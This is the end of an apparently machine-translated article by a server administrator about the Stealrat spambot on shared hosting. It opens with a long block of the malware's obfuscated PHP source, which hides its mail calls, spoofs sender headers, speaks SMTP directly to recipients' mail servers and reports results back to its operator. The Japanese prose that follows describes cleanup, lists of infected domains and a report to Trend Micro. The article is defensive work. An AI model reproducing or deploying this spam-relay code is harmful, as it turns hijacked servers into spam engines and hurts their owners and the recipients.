$v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42); $v0897acf4 = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']); if (ne667da76($v0897acf4) || @ini_get('safe_mode')) $v10497e3f = false; else $v10497e3f = true; $v9a5cb5d8 = "$vee11cbb1@$v0897acf4"; if ($vb068931c != '') $vd98a07f8 = "$vb068931c <$v9a5cb5d8>"; else $vd98a07f8 = $v9a5cb5d8; $vb8ddc93f = "From: $vd98a07f8\r\n"; $vb8ddc93f .= "Reply-To: $vd98a07f8\r\n"; $v3c87b187 = "X-Priority: 3 (Normal)\r\n"; $v3c87b187 .= "MIME-Version: 1.0\r\n"; $v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n"; $v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n"; $v1e66f6b4 = 'ma'.chr(105).'l'; if (!in_array('m'.'a'.'il', $v619d75f8)) { if ($v10497e3f) { if (@$v1e66f6b4($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f.$v3c87b187, "-f$v9a5cb5d8")) { echo(chr(79).chr(75).md5(1234567890)."+0\n"); continue; } } else { if (@$v1e66f6b4($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) { echo(chr(79).chr(75).md5(1234567890)."+0\n"); continue; } } } $v4340fd73 = "Date: " . @date("D, j MYG:i:s O")."\r\n" . $vb8ddc93f; $v4340fd73 .= "Message-ID: <".preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time()))."@$v0897acf4>\r\n"; $v4340fd73 .= "To: $v01b6e203\r\n"; $v4340fd73 .= "Subject: $vc34487c9\r\n"; $v4340fd73 .= $v3c87b187; $v841a2d68 = $v4340fd73."\r\n".$v6f4b5f42; if ($v3d26b0b1 == '') $v3d26b0b1 = n9c812bad($v3a5939e4); if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) { echo(chr(79).chr(75).md5(1234567890)."+1\n"); continue; } else { echo PHP_OS.chr(50).chr(48).'+'.md5(0987654321)."+$vb4a88417\n"; } } function ne667da76($v957b527b){ return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); } function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a = false) { $vf5a8e923 = strlen($vb45cffe0); $vb4a88417 = ''; for($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) { if ($v11a95b8a >= 75) { $v11a95b8a = $v92f21a0f; $vb4a88417 .= $v7fa1b685; } $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]); if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) { if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) { $vb4a88417.=chr($v4a8a08f0); $v11a95b8a = 0; continue; } $vb4a88417 .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT); $v11a95b8a += 3; continue; } $vb4a88417 .= chr($v4a8a08f0); $v11a95b8a++; } return $vb4a88417; } function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1) { global $v619d75f8; if (!in_array('fsockopen', $v619d75f8)) $v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('pfsockopen', $v619d75f8)) $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client")) $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20); else return -1; if (!$v66b18866) { return 1; } else { $v8d777f38 = n54070395($v66b18866); @fputs($v66b18866, "EHLO $v0897acf4\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "2+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "3+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d2f00, 0, 3) != 251) return "4+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "DATA\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 354 ) return "5+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, $v841a2d68."\r\n.\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "6+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "QUIT\r\n"); @fclose($v66b18866); return 0; } } function n54070395($v66b18866) { $v8d777f38 = ''; while($v341be97d = @fgets($v66b18866, 4096)) { $v8d777f38 .= $v341be97d; if(substr($v341be97d, 3, 1) == ' ') break; } return $v8d777f38; } function n9c812bad($vad5f82e8) { global $v619d75f8; if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) { @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816); if (count($v744fa43b) === 0) return '127.0.0.1'; $v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816)); return $v744fa43b[$v865c0c0b[0]]; } else { return '127.0.0.1'; } } function n9a2d8ce3($v1cb251ec) { $v1cb251ec = base64_decode($v1cb251ec); $vc68271a6 = ''; for($v865c0c0b = 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++) $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2); return $vc68271a6; } ?>

IPアドレスのリスト、おそらくこのリストにあるサーバーのIPを見てください。その場合は、自分で問題を特定してください。定期的に共有ホスティングを利用している場合は、隣人がStealratという名前でこのような感染を起こしていることをホスティング業者に書きます。次に何をすべきかわかりません。問題はローカライズされており、穴はすべて閉じられていますが、リクエストは常に寄せられています。一意のIPのリストが補充および補充されます。サーバーに負荷はありませんが、何が起こっているのか、そしてそのような量の知識しかありません...誰がそれを書くべきか、そしてIPデータのすべての所有者に警告する方法を知っています。たぶんあなたの一人が教えてくれます。

私たちはtrendmicroにこのIPアドレスのリストをどうするかを尋ねる手紙を書きました。おそらく彼らは促し、おそらくそうではないでしょう。おそらく、感染したIPなどを追加できるサービスがあります。

幸運を祈ります。サーバーの世話をしてください。

更新1.すべての感染サイトをログから選択（スパムメッセージの本文から）
プレートでは、サーバーのドメインとIP。リストはドメインごとに一意です。
リスト（4705）

更新2.ドメインの追加選択（ホスト名）
プレートでは、サーバーのドメインとIP。リストはドメインごとに一意です。
リストを提供してくれたユーザーxaker1に感謝します。
リスト（1223）

スパムボットステラット

技術仕様

検出、兆候、最初の措置

コード分​​析、悪意のあるスクリプトによる詳細の検索

次に何をしましたか？

いくつかの統計

More articles:

コード分析、悪意のあるスクリプトによる詳細の検索